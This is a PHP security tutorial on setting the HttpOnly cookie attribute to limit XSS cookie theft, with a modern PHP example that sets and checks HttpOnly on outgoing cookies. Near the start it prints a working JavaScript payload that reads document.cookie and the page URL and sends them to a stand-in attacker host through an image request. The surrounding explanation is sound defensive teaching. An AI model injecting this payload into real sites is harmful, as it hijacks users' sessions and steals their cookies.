
XSS defense: using HttpOnly in PHP to mitigate XSS attacks (PHP example)

Jun 07, 2016 pm 05:21 PM
httponly xss attack

The concept of XSS needs no introduction; its impact is severe. Once your site has an XSS hole, an attacker can run arbitrary JavaScript in your users' browsers, and the worst case is that the script reads the cookie and hijacks the session. If that cookie carries the session of an administrator or another sensitive identity, it is game over.

The following JavaScript is the classic cookie-stealing payload an attacker injects: it reads the cookie jar and the current URL and smuggles them out in the query string of an image request to a host the attacker controls (www.test.com here stands in for that host):

The code is as follows:

// Page URL and cookie jar, URL-encoded so the query string survives intact
url = encodeURIComponent(top.location.href);
cookie = encodeURIComponent(document.cookie);
// An Image request is not subject to same-origin read restrictions; the
// attacker only needs the request to arrive, never the response
c = new Image();
c.src = 'http://www.test.com/c.php?c=' + cookie + '&u=' + url;

Cookies are normally read through the document object (document.cookie). Browsers today honour a cookie attribute called HttpOnly, which the server sets in the Set-Cookie header alongside attributes such as Domain and Path. Once HttpOnly is set on a cookie, the browser still sends it with every matching HTTP request, but it no longer appears in document.cookie, so the payload above exfiltrates nothing useful.

Setting HttpOnly in PHP

The code is as follows:

// In php.ini, session.cookie_httponly = 1 enables HttpOnly on the session cookie globally.
// The same setting can be made per script; it must run BEFORE session_start():
ini_set("session.cookie_httponly", 1);

// Alternatively, pass true as the fifth argument (httponly) of session_set_cookie_params(),
// again before session_start(). For an individual cookie set with setcookie(),
// HttpOnly is the seventh positional argument.
// (lifetime 0 = browser-session cookie, path "/", current host only, secure=false, httponly=true)
session_set_cookie_params(0, '/', '', false, true);

For PHP versions older than 5.2 (the httponly argument of setcookie() and the session.cookie_httponly setting were added in PHP 5.2.0), emit the header by hand; the attribute name is case-insensitive, so httpOnly and HttpOnly are equivalent:

The code is as follows:

header("Set-Cookie: hidden=value; httpOnly");
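As an added example that is not part of the original article, the script below puts the three mechanisms above (session cookie parameters, setcookie(), and a hand-written Set-Cookie header) into one request handler for a modern PHP (7.3 or later) install, and then self-checks the queued response headers so that a cookie without HttpOnly cannot slip out unnoticed. The cookie names `hidden` and `legacy`, the path, the SameSite value and the use of headers_list() for the check are this example's own choices, not something the article prescribes.

```php
<?php
// Added example (not from the original article): set HttpOnly on the PHP
// session cookie and on application cookies, then verify the outgoing headers.
// Requires PHP 7.3+ for the array form of session_set_cookie_params()/setcookie().

declare(strict_types=1);

// 1) Session cookie: must be configured BEFORE session_start().
//    Per-script equivalent of session.cookie_httponly = 1 in php.ini.
session_set_cookie_params([
    'lifetime' => 0,       // browser-session cookie
    'path'     => '/',
    'domain'   => '',      // current host only
    'secure'   => true,    // send only over HTTPS (relax on plain-HTTP test setups)
    'httponly' => true,    // hidden from document.cookie
    'samesite' => 'Lax',   // also limits cross-site sending (CSRF); PHP 7.3+
]);
session_start();

// 2) Application cookie: HttpOnly is the 7th positional argument of setcookie(),
//    or the 'httponly' key of the options array used here (PHP 7.3+).
setcookie('hidden', 'value', [
    'expires'  => time() + 3600,
    'path'     => '/',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Lax',
]);

// 3) Pre-5.2 style fallback, kept for comparison: write the header by hand.
//    replace=false keeps the earlier Set-Cookie headers instead of overwriting them.
header('Set-Cookie: legacy=value; Path=/; HttpOnly', false);

/**
 * Return every Set-Cookie header queued for this response that lacks HttpOnly.
 * headers_list() only sees headers before output starts, so call this last.
 */
function cookiesWithoutHttpOnly(): array
{
    $missing = [];
    foreach (headers_list() as $h) {
        if (stripos($h, 'Set-Cookie:') === 0 && stripos($h, 'httponly') === false) {
            $missing[] = $h;
        }
    }
    return $missing;
}

$missing = cookiesWithoutHttpOnly();
header('Content-Type: text/plain');
echo $missing
    ? "Cookies missing HttpOnly:\n" . implode("\n", $missing) . "\n"
    : "All Set-Cookie headers carry HttpOnly\n";
```

To exercise it, save the file as cookie.php, run `php -S localhost:8080 cookie.php`, and inspect the response with `curl -sI http://localhost:8080/`: every Set-Cookie line should end with the HttpOnly attribute. Note that curl shows the headers regardless, but a browser will refuse to store the two `Secure` cookies over plain HTTP; that is the intended behaviour, and the reason the `secure` flag is worth keeping in production.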

Finally, HttpOnly is not a silver bullet! It only stops script from reading the cookie value. An XSS payload running in the page can still issue requests that the browser sends with the session cookie attached, so the attacker can act as the logged-in user without ever seeing the cookie. Treat HttpOnly as defence in depth; the real fix is to prevent the injection in the first place, with context-aware output encoding of untrusted data.
